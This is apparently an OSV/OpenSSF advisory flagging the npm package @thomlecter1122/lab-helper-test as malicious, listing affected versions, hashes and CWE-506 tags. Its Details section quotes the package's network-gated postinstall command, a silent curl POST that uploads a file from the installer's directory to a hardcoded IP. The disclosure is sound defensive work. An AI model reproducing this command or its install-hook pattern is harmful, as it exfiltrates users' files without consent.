MAL-2026-5534

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@thomlecter1122/lab-helper-test/MAL-2026-5534.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5534
Published
2026-06-10T23:35:46Z
Modified
2026-06-12T20:01:46.638981524Z
Summary
Malicious code in @thomlecter1122/lab-helper-test (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a)

The package ships a postinstall lifecycle script (sec_check.js) that fires automatically on npm install. The script first checks whether the host has a non-internal IPv4 address beginning with 192. (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt" via child_process.execSync with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.0.16"
            ],
            "sha256": "650b9b18b0bc5101d5d948edf6bb841af88e20509a061dbbfe3fa21a8658b819",
            "source": "amazon-inspector",
            "modified_time": "2026-06-10T23:35:46Z",
            "import_time": "2026-06-11T00:00:58.506202458Z",
            "id": "IN-MAL-2026-005322"
        },
        {
            "versions": [
                "0.0.11"
            ],
            "sha256": "9448c8cb290ff20cf707537035a6c383a4506b452c3ddc0e4c56bc398e02dbc7",
            "modified_time": "2026-06-10T23:36:46Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T00:00:58.699196382Z",
            "id": "IN-MAL-2026-005324"
        },
        {
            "versions": [
                "0.0.15"
            ],
            "sha256": "c15cab8e8dc86301754623991e2ae38130feb1a7b5d26e7a204ac2fbd918a166",
            "source": "amazon-inspector",
            "modified_time": "2026-06-10T23:36:56Z",
            "import_time": "2026-06-11T00:00:58.797247524Z",
            "id": "IN-MAL-2026-005325"
        },
        {
            "versions": [
                "0.0.2"
            ],
            "sha256": "cef9ef58b6705aee11294b49f3e944e60b4047973a98378abc2f37e3dacd627b",
            "modified_time": "2026-06-10T23:36:37Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T00:00:58.593243686Z",
            "id": "IN-MAL-2026-005323"
        },
        {
            "versions": [
                "0.0.5"
            ],
            "sha256": "e12350df6e9a9d5a75f3796a6ebe9c08156ada9cbfd29acd480bf78fa51e61b9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-10T23:37:03Z",
            "import_time": "2026-06-11T00:00:58.956948473Z",
            "id": "IN-MAL-2026-005326"
        },
        {
            "versions": [
                "0.0.3"
            ],
            "sha256": "75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a",
            "modified_time": "2026-06-12T19:02:47Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:43:37.50710346Z",
            "id": "IN-MAL-2026-005827"
        }
    ]
}
References
Credits

Affected packages

npm / @thomlecter1122/lab-helper-test

Package

Name
@thomlecter1122/lab-helper-test
View open source insights on deps.dev
Purl
pkg:npm/%40thomlecter1122%2Flab-helper-test

Affected ranges

Affected versions

0.*
0.0.2
0.0.3
0.0.5
0.0.11
0.0.15
0.0.16

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "lab-helper-test-0.0.16.tgz",
            "hashes": {
                "sha512_sri": "sha512-Avp3BR3qRNDjs+0GAO/nizPNvTvuY1JzD9gxGJ7JBprvx6vPaD+0bUSajv6JDQNCLchRgnkZmvk7DjU+mxd2Yg==",
                "sha1": "9e35d4d7f0a16fe5ce57e81d1bd9a02918b9af5b"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "3ed6e162a46f00edce3bcaf365b5a9ac82d4c9e9c5a4c8efaa9622e68b1cafe7",
            "path": "router_init.js",
            "tlsh": "7201ef6ccf217988190054cb38eba92a846b03d4f4a468e54aed1ecb8675b5764fb8c8"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@thomlecter1122/lab-helper-test/MAL-2026-5534.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]